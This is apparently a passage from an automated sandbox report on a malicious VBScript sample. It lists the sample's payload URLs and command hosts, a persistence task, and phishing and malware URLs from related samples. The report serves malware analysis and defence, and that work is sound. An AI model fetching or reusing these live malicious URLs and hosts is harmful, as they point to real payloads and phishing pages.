                                  http://144.91.79.54/2412/filewscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54/2412/cnwscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1288515705.000001B4FDC81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54/wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1298744247.000001B4FC015000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300122294.000001B4FC01B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297980853.000001B4FC00F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297309774.000001B4FBFF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54/2412/r4Cwscript.exe, 00000000.00000003.1273950809.000001B4FBFDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54:80/2412/sPHwscript.exe, 00000000.00000003.1263929463.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://144.bd060wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    144.91.79.54
                                    		unknownGermany
                                    		51167CONTABODEtrue
                                    104.26.12.205
                                    		api.ipify.orgUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    162.254.34.31
                                    		unknownUnited States
                                    		64200VIVIDHOSTINGUStrue

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1590535
                                    Start date and time:2025-01-14 08:46:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:009.vbe
                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.expl.evad.winVBE@10/12@2/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 66
                                    • Number of non-executed functions: 6
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 51.137.137.111, 172.202.163.200, 2.22.50.144, 2.22.50.131, 20.3.187.198, 13.85.23.206, 20.190.160.22, 40.126.32.138, 40.126.32.140, 40.126.32.72, 40.126.32.68, 20.190.160.17, 40.126.32.136, 40.126.32.76, 104.208.16.94, 13.107.246.45
                                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:47:09API Interceptor11x Sleep call for process: wscript.exe modified
                                    04:11:04API Interceptor34x Sleep call for process: powershell.exe modified
                                    04:11:10API Interceptor17x Sleep call for process: MSBuild.exe modified
                                    04:11:26API Interceptor1x Sleep call for process: wermgr.exe modified
                                    08:47:11Task SchedulerRun new task: bEvujIIdkyIbOgF path: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    144.91.79.54Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                    • 144.91.79.54/1211/file
                                    Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                    • 144.91.79.54/1211/file
                                    BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                    • 144.91.79.54/1211/file
                                    Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                    • 144.91.79.54/0911/file
                                    SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                    • 144.91.79.54/0911/file
                                    Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                    • 144.91.79.54/0911/file
                                    MV EAGLE EYE RFQ-92008882920-PDF.vbsGet hashmaliciousUnknownBrowse
                                    • 144.91.79.54/2210/file
                                    Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 144.91.79.54/2210/file
                                    Chronopost_FormulaireAdresse.vbsGet hashmaliciousAsyncRATBrowse
                                    • 144.91.79.54/2210/file
                                    Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                    • 144.91.79.54/1210/file
                                    104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                    • api.ipify.org/
                                    jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/?format=text
                                    xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                    • api.ipify.org/
                                    GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                    • api.ipify.org/
                                    8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                    • api.ipify.org/
                                    Simple2.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                    • api.ipify.org/
                                    Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                    • api.ipify.org/

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-part-0017.t-0009.t-msedge.nethttp://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                    • 13.107.246.45
                                    https://iyztciuamr.cfolks.pl/ppGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    https://precheckcar.com/wp-admin/common/oauth2/v2.0/authorize/?client_id=f01f3e6e-ddd5-44393-8b7f-1e5d6348b58aGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    https://precheckcar.com/wp-admin/Get hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    https://offfryfjtht767755433.webflow.io/Get hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    https://ipfs.fleek.co/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/Get hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    https://bitvavo.debak.nl/signin-oidcGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.45
                                    https://www.google.ca/url?b21dp0=https://www.reillyreevesandhorton.edu&TA=DQ&TA=5E&bg=OW&TA=E7&TA=TV&q=%2561%256d%2570%2F%2568%256D%2539%2569%2531%2539%252E%2564%2565%256B%2563%2568%256F%2562%2574%2569%2565%2577%252E%2563%256F%256D%252F%2566%2569%256E%2561%256E%2563%2565%2540%2563%256F%256E%2564%2565%256E%2561%2573%2574%252E%2563%256F%256D&opdg=NTk&NXk=Zng&Q1k=R0gGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.45
                                    https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousUnknownBrowse
                                    • 13.107.246.45
                                    bg.microsoft.map.fastly.netRFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                    • 199.232.210.172
                                    possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    3ClBcOpPUX.exeGet hashmaliciousCyberGateBrowse
                                    • 199.232.210.172
                                    40#U0433.docGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    KymUijfvKi.docGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    Rev5_ Joint Declaration C5 GER_track changes.docGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    RoYAd85faz.docGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    40#U0433.docGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    RoYAd85faz.docGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSpossible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                                    • 104.18.69.40
                                    92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                    • 188.114.96.3
                                    phishing.emlGet hashmaliciousPhisherBrowse
                                    • 188.114.96.3
                                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.16.1
                                    https://tinyurl.com/286oc4lyGet hashmaliciousUnknownBrowse
                                    • 104.17.112.233
                                    http://hotpepperliberia.comGet hashmaliciousUnknownBrowse
                                    • 172.67.130.110
                                    https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7QwGet hashmaliciousUnknownBrowse
                                    • 104.17.113.39
                                    http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                    • 172.67.74.152
                                    https://fsgospefx6g2.sg.larksuite.com/wiki/Y7ybwFESRiirQPkoARZlhCyVgFb?Get hashmaliciousHTMLPhisherBrowse
                                    • 1.1.1.1
                                    http://mshare-54543.pages.dev/index-2tuka/Get hashmaliciousUnknownBrowse
                                    • 172.66.47.106
                                    VIVIDHOSTINGUSrRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    VYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    arm4.elfGet hashmaliciousMiraiBrowse
                                    • 192.154.238.20
                                    Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.254.34.31
                                    DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                    • 162.254.34.31
                                    Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                    • 162.254.34.31
                                    CONTABODEtrow.exeGet hashmaliciousUnknownBrowse
                                    • 5.189.128.121
                                    17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    • 213.136.81.72
                                    8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144
                                    gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                    • 161.97.142.144

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eRFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                    • 104.26.12.205
                                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 104.26.12.205
                                    https://performancemanager10.successfactors.com/sf/hrisworkflowapprovelink?workflowRequestId=V4-0-a1-iHQRWD3bQis7XhhWNKzjfWwnvURbEsN0CxUc27Zt3ml0ag&company=oceanagoldT2&username=dave.oliver@oceanagold.comGet hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    https://imtcoken.im/Get hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5qGet hashmaliciousHTMLPhisherBrowse
                                    • 104.26.12.205
                                    http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?eGet hashmaliciousHTMLPhisherBrowse
                                    • 104.26.12.205
                                    https://eb-ri18.vercel.app/verset.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 104.26.12.205
                                    https://metahorizonsfacebooksupport.tempisite.com/italy39Get hashmaliciousHTMLPhisherBrowse
                                    • 104.26.12.205
                                    http://ubiquitous-twilight-c9292b.netlify.app/Get hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    https://jaffeusacanna-9646.vercel.app/zqh.heups/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.26.12.205

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_8324a99a-bfc4-4aff-b4a8-f077a3e1cd39\Report.wer

                                    Download File
                                    Process:C:\Windows\System32\wermgr.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.5343815601458936
                                    Encrypted:false
                                    SSDEEP:96:PWFZ0Kj1rxYidSRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAJf/VXT5NHn:u7F1mGSR30wAAzuiFhZ24lO8
                                    MD5:E7B57D9B24D8432A4479E80C05DF64A0
                                    SHA1:1CA32D10E99885489D2CFDB5583A75F75BAA3590
                                    SHA-256:BC72211B59DD1E87614B10C2A13B9843E8C6A6A34B0EB8608FA645DE779B0936
                                    SHA-512:9184ED840B0BF729A128B2F58352610B84B4C45A21ABB9990C0549060F6F682ED2396DBF27704B7615A4CB9EAB4C6A8ED4A2504288BE7B5346D0ACFE4E7B58A3
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.1.9.6.8.1.2.1.4.5.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.1.9.4.6.9.2.4.7.3.4.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.2.4.a.9.9.a.-.b.f.c.4.-.4.a.f.f.-.b.4.a.8.-.f.0.7.7.a.3.e.1.c.d.3.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.9.c.-.0.0.0.1.-.0.0.1.4.-.a.3.4.8.-.e.b.3.a.6.4.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE02.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\System32\wermgr.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):7414
                                    Entropy (8bit):3.686027886401724
                                    Encrypted:false
                                    SSDEEP:96:RSIU6o7wVetb6bbvN6YN5ngmfHNV9re5Rwy55aMn3Tjm:R6l7wVeJ6bbvN6YN5ngmftq5pn3Tjm
                                    MD5:28DE7677289C46EC9D377F9B8FB8D342
                                    SHA1:750A6FA0F968090C4FEB2B5165261735CF420757
                                    SHA-256:079201C36C5197EA8273089131117BDFF9FE027346AD0E96499378AAB994554A
                                    SHA-512:947DE279396DC502DEEA6CFD431ECA80B96F69ACC370E2CBEDA997C9A1889169E952514DCBA261D4D7E4CAC742D134E7104DEFB927ADCB7C1DFB18E98CECA392
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.3.6.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE61.tmp.xml

                                    Download File
